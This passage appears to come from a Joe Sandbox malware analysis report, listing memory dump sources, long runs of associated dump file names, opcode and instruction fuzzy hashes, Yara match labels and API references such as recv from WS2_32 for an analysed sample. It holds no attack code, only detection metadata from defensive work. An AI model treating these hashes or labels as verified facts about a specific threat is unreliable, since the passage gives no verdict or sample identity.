                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                                                                                                  • Opcode ID: d61ad9c6b8c3a9e1aa271d127845b442b570329da01ae87145e8495ce8c0d016
                                                                                                                                                                                                                                                  • Instruction ID: edd206e5e6d794dda8a732b59345c24300adaabcb11eb513ed8f599e9691f2cb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d61ad9c6b8c3a9e1aa271d127845b442b570329da01ae87145e8495ce8c0d016
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6B11670A10268DFEB29CF14CD94BDEB7B5EF09304F9081D8E909A7281D775AA84CF90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2199604180.00000000056F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_56f0000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b568dd32cadcb8f8fee47c40c3e67fea546333f21af11fa3b68827c6dac5b223
                                                                                                                                                                                                                                                  • Instruction ID: 2cc88094bd66b44baf9d651cff679555435697f3c1cc5dae530fcfa11cb67093
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b568dd32cadcb8f8fee47c40c3e67fea546333f21af11fa3b68827c6dac5b223
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E001D6EFA08111BE6152D6456B089F7B7AFE6DB7303308426F507C6603D2945E57E336
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2199604180.00000000056F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_56f0000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 1fc369ac11c54de501f9851b4d73d5d2de85b735d78c244877bb26710eec4e10
                                                                                                                                                                                                                                                  • Instruction ID: 4ea19059e8316b580f06fbfe115b3fc0447b09979aa04faafe0df28b209cfcc8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fc369ac11c54de501f9851b4d73d5d2de85b735d78c244877bb26710eec4e10
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3001D2EFA08211BD6152D6466B089F6B7AFE6DB730330842BF503C6603D2941A5BE332
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2199604180.00000000056F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_56f0000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 60b99f082532695f42ba063b4b9314c014333907953dc05800147759cb173461
                                                                                                                                                                                                                                                  • Instruction ID: 8544bee41b5d01dabc1010c5565f026761ca985046b1990d78b653b40e63c8a7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60b99f082532695f42ba063b4b9314c014333907953dc05800147759cb173461
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F8F062EF909211BD6102D1826B59AF6AB5AD5DA730330C467F517C6647C1940A5BE332
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2199604180.00000000056F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_56f0000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 586f48d85ef9e28b647e04ff9d40619188fbe4a378b462b9ae53a223b7325797
                                                                                                                                                                                                                                                  • Instruction ID: 6f29c0b14fd44743ce0200c3e50ba9f1024b53a695bf79badf09afb9419376fd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 586f48d85ef9e28b647e04ff9d40619188fbe4a378b462b9ae53a223b7325797
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CF0C8AF90C251BDA10391911B5C6F77B67E9EB73033040A7F603CA657C5860A5BD772
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2199604180.00000000056F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_56f0000_file.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: ee0de6a34e74f59557d383dde2d889db147bf15550e6c53af9884452bc8082ce
                                                                                                                                                                                                                                                  • Instruction ID: d3c2513a226f8f5323ef8ddfc746e4021980b1e4e7627bbbdded603870b3287f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ee0de6a34e74f59557d383dde2d889db147bf15550e6c53af9884452bc8082ce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01F0ECEF90C211BD2102D1822B196B6AA5BA1EA730730C417F607C6607D1840A97E332
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                  • Opcode ID: b34ec22e9435eac43c4936120e6464652c6585d0eecca80211380820e408cc69
                                                                                                                                                                                                                                                  • Instruction ID: 0e4e98a1007b9ff711c5e5aab5d5c298c3cded0230d94c47a1aa8c3cc7090638
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b34ec22e9435eac43c4936120e6464652c6585d0eecca80211380820e408cc69
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3C249B1E086288FCB25CE28DD417EAB7B5EB48305F1451EAD84DF7281E775AE818F41
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • recv.WS2_32(?,?,00000004,00000000), ref: 00E7E10B
                                                                                                                                                                                                                                                  • recv.WS2_32(?,?,00000008,00000000), ref: 00E7E140
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196209795.0000000000EE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196754597.0000000001044000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196803010.0000000001046000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196861541.0000000001060000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196929723.0000000001062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.0000000001064000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197025606.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197226626.0000000001071000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197274526.0000000001072000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197319993.0000000001073000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197336056.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197351405.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197368124.0000000001077000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197387878.0000000001087000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197406058.0000000001088000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197421861.0000000001090000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197436156.0000000001091000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197456283.000000000109B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197483072.00000000010B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197496941.00000000010B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197511577.00000000010B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197534330.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197552110.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197573093.00000000010D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197588614.00000000010D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197603661.00000000010DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197621231.00000000010DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197636461.00000000010DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197652075.00000000010E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197667145.00000000010EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197684755.00000000010ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197701941.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197721155.00000000010F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197741991.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197758687.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197778523.0000000001123000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001129000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197793728.0000000001148000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197836095.0000000001175000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197852578.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197867704.0000000001177000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197888161.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197904103.000000000117F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197921784.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2197937546.000000000118F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_e70000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: recv
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1507349165-0
                                                                                                                                                                                                                                                  • Opcode ID: 8d39e80023fe57e0fe891000129b1958db8acd452ffd503ffec104f874ebf606
                                                                                                                                                                                                                                                  • Instruction ID: f07a5e064c0eb6ade62d125eb3a48f082f3ea2b4771508027abfeae1fcadb4f4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d39e80023fe57e0fe891000129b1958db8acd452ffd503ffec104f874ebf606
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8031C771A002489FD720CB69EC81BAB77BCEB0C728F5056A6E518F73D1D775A8498B60
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.2196086802.0000000000E71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196066173.0000000000E70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196086802.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196175328.0000000000ED9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.2196190868.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
